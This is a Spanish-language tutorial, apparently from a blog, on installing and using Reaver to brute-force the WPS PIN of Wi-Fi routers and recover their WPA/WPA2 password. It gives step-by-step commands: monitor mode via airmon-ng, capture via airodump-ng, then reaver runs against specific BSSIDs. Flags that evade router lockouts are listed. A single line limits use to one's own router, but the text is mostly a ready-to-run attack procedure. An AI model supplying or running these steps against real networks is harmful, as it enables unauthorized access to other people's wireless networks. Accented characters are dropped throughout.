En esta ocasin vamos a ver un tutorial completo del uso de Reaver.

Qu es Reaver?
Reaver es un software que se utiliza por terminal que busca explotar la debilidad de routers con
WPS activado por medio de un ataque de fuerza bruta
probando todas las posibilidades hasta que encuentra el pin del router y no brinda la contrasea
del mismo.

Para qu sirve el Reaver?

Sirve para conseguir la password WPA o WPA2 de un router sin necesidad de diccionarios.
El Reaver debe utilizarce solo con nuestro propio router
terminal

Cmo se instala Reaver?

wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

tar -xvf reaver-1.4.tar.gz

cd reaver-1.4/src

./configure
make
make install

Cmo se usa Reaver?

Esta es la parte principal del post, vamos a ver detalladamente su uso y funciones.
En mi caso esw wlan0, pero puede variar

Paso 1:
Ser root

sudo su

Paso 2:
Escanear en busca de redes con WPS activo

iw wlan0 scan

Despues del escaneo digamos que vamos a atacar una red llamada "Stbangm" con BSSID
"20:aa:4b:20:a4:9f" y esta en el canal 11.

Paso 3:
Poner nuestra tarjeta Wifi en modo monitor.

airmon-ng start wlan0

Paso 4:

Dar de baja nuestra tarjeta wlan0

ifconfig wlan0 down

Paso 5:
Ponemos nuestra tarjeta en modo de "ataque"

airodump-ng mon0 -w wps-test --beacons --channel 11 --bssid 20:aa:4b:20:a4:9f

COMANDOS DEL REAVER:

Antes de seguir tenemos que ver los comandos que le podemos dar al Reaver para que funcione y
cumpla con algunas cosillas ms:

-Comandos requeridos

-i tarjeta en modo monitor | Definimos la tarjeta que esta en modo monitor. Ejm: reaver i- mon0
-b BSSID de atacar | Ponemos la BSSID de el router a atacar. Ejm: reaver -b 20:aa:4b:20:a4:9f

-Comandos opcionales (De estos no voy a dar ejemlos porque no son necesarios)

-m | MAC del sistema.

-e | ESSID del router a atacar es decir, el nombre de la red.
-c | Canal del router a atacar.
-o | Ponemos el nombre de un archivo al que Rever va dandonos su log.
-s | Restaurar una sesin especifica a restaurar (Nombre del archivo)
-c | Ejecuta el comando dado al terminar el trabajo

-a | Detecta y usa automaticamente las opciones avanzadas recomendadas por Reaver

-n | Reporta errores no-criticos
-q | Solo reporta errores crticos
-h | Muestra la ayuda.
-p | Empieza por el pin que le digamos, ya sean 4 u 8 dgitos
-d | Define un tiempo en segundos entre cada intendo de pin
-l | Ajusta el tiempo de espera si el router se bloquea
-g | Cancela el ataque despues de cierta cantidad de intentos.
-x | Define el tiempo de espera despues de 10 intentos.
-r | Descansa cierto tiempo cada cierta cantidad de intentos.
-A | No asocia con el router si consigue la password, solo da la password.
-N | No envia mensajes de NACK.
-L | Ignora mensajes de bloqueo del router a atacar.

Paso 6: (Esto debe hacerse en otra terminal como root.)

Atacar con Reaver.
Esta es la parte ms interesante de todo el proceso, ya que ac es donde el ataque sale y tardeo
temprano nos dara la pass del router.
Esta parte puede durar hasta 7 das dependiendo del router a atacar, la seal y los bloqueos.
En mi caso estoy atacando un router Linksys pero me bloque 1 minuto cada 5 intentos y llevo 3
dias y apenas lleva el 45%, otros router bloquean hasta 24 horas.

reaver -i mon0 -b 20:aa:4b:20:a4:9f

Este codigo puede combinarse con todos los comando que puse arriba, otro ejemplo seria:

reaver -i mon0 -b 34:08:04:0e:53:f2 -a -c 11 -N -d 5